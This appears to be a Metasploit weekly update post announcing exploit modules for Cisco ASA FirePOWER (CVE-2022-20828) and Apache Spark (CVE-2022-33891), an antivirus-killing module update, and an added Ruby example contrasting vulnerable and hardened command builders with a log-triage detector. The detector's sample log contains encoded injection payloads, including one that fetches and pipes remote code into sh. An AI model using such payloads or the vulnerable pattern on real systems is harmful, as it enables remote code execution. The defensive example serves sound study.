CVSS3: 8.8 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: LOW
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS2: 9.0 High
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: SINGLE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE
  Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
jbaines-r7 added a new module that exploits an authenticated command injection vulnerability, CVE-2022-20828, in Cisco ASA-X with FirePOWER Services. This vulnerability affects all Cisco ASA appliances that support the ASA FirePOWER module. Note that although a patch has been released for the most recent ASA FirePOWER module versions, such as 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21, some versions (6.2.2 and earlier, 6.3, 6.5, and 6.7) will not receive the patch. This exploit could allow an attacker to gain root access and pivot to both the inside and outside networks. The exploit takes advantage of the FirePOWER Services SFR module's Linux virtual machine via ASA's ASDM web server; that module also runs Snort on the traffic diverted to it, so an attacker can access the diverted traffic as well. Check out the video of the exploit for more information!
KostyaKortchinsky and h00die-gr3y introduced a new module that exploits a remote code execution vulnerability, CVE-2022-33891, in Apache Spark. It affects Apache Spark versions 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1. Apache Spark lets users enable Access Control Lists (ACLs) via the configuration option spark.acls.enable. This option was introduced to improve access control within a Spark application, but the code path triggered by it contains a shell command injection vulnerability. Check out this post by HuskyHacks, who provided more information along with great examples!
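The injection class behind the Spark module, as an added example that is not part of the original post, the Metasploit module, or Apache Spark's code base. It assumes (an assumption, not something the page states) that the ACL code path resolves a principal's groups by running `id -Gn <user>` through a shell, with the principal taken from the request's doAs parameter. The vulnerable command builder, the hardened argv builder, the `suspicious_doas?` log-triage check, the `query_params` helper and the sample access-log lines are all constructed here:

```ruby
require 'uri'

# Added example (not the Metasploit module's code and not Apache Spark's):
# illustrates the injection class behind CVE-2022-33891 and a hardened
# variant. Assumption: the ACL code path resolves a user's groups by shelling
# out to `id -Gn <user>`, with <user> taken from the doAs parameter.

# Vulnerable shape: the principal is interpolated into a string handed to a
# shell, so shell metacharacters in `user` become additional commands.
def vulnerable_group_lookup_command(user)
  "bash -c \"id -Gn #{user}\""
end

# Hardened shape: allow-list the principal and return an argv array for
# Process.spawn / IO.popen (array form), so no shell ever parses it.
USERNAME_RE = /\A[a-z_][a-z0-9_.-]{0,31}\z/i

def safe_group_lookup_argv(user)
  unless user.match?(USERNAME_RE)
    raise ArgumentError, "rejected doAs principal #{user.inspect}"
  end
  ['id', '-Gn', user]
end

# Characters that let a value break out of an interpolated shell string.
SHELL_META = /[;&|`$(){}<>\\"'\n]/

# Hypothetical helper: decode the query string of a request target
# ("/?doAs=...") into [key, value] pairs, percent-decoding each side.
def query_params(request_target)
  _path, _sep, query = request_target.partition('?')
  return [] if query.empty?
  query.split('&').map do |pair|
    key, _eq, val = pair.partition('=')
    [URI.decode_www_form_component(key), URI.decode_www_form_component(val)]
  end
end

# Flag a request target whose doAs parameter contains shell metacharacters.
def suspicious_doas?(request_target)
  query_params(request_target).any? do |key, val|
    key == 'doAs' && val.match?(SHELL_META)
  end
rescue ArgumentError
  true # malformed percent-encoding in the query: treat as suspicious
end

# Constructed sample request lines in the style of a reverse-proxy access log.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - "POST /?doAs=spark HTTP/1.1" 200
  10.0.0.9 - - "POST /?doAs=%60id%60 HTTP/1.1" 200
  10.0.0.9 - - "POST /jobs/?doAs=x%3Bcurl%20http%3A%2F%2F10.0.0.9%2Fa%7Csh HTTP/1.1" 200
  10.0.0.7 - - "GET /?user=x;id HTTP/1.1" 200
LOG

# Return the request targets from the log that look like injection attempts.
def flagged_targets(log = SAMPLE_LOG)
  log.each_line.map do |line|
    target = line[/"(?:GET|POST) (\S+) HTTP/, 1]
    target if target && suspicious_doas?(target)
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  puts vulnerable_group_lookup_command('spark;id')
  p safe_group_lookup_argv('spark')
  flagged_targets.each { |t| puts "suspicious: #{t}" }
end
```

The hardened builder rejects the principal rather than escaping it: an allow-list on the username plus an argv array removes the shell from the path entirely, which is a stronger fix than quoting. The triage check decodes before matching, since a real payload in a log will usually arrive percent-encoded.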
The spark.acls.enable setting permits command injection through the id command via a POST request to Apache Spark's base endpoint containing arbitrary code in the doAs parameter. The exploit achieves unauthenticated RCE as the spark user.

The post/windows/manage/killav.rb
script has been updated to support shell and PowerShell sessions and has undergone some code cleanup. Additionally, documentation has now been created to explain its operation and how to use it.

… post/windows/gather/memory_dump module.

… #run_sql post method.

… domain_controller? method to allow lower-privileged users to invoke it, extends it to support shell sessions, and adds additional useful domain controller enumeration methods to the library.

… cmd/unix/reverse_ssh that stopped reverse SSH sessions from opening.

… rpc.call('db.analyze_host', { host: '<metasploitable3 ip>', workspace: 'other' })

… find command's perm parameter while also maintaining support for the deprecated syntax.

… Rex::Proto::Http::Client to rely on Ruby's built-in string comparison.

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).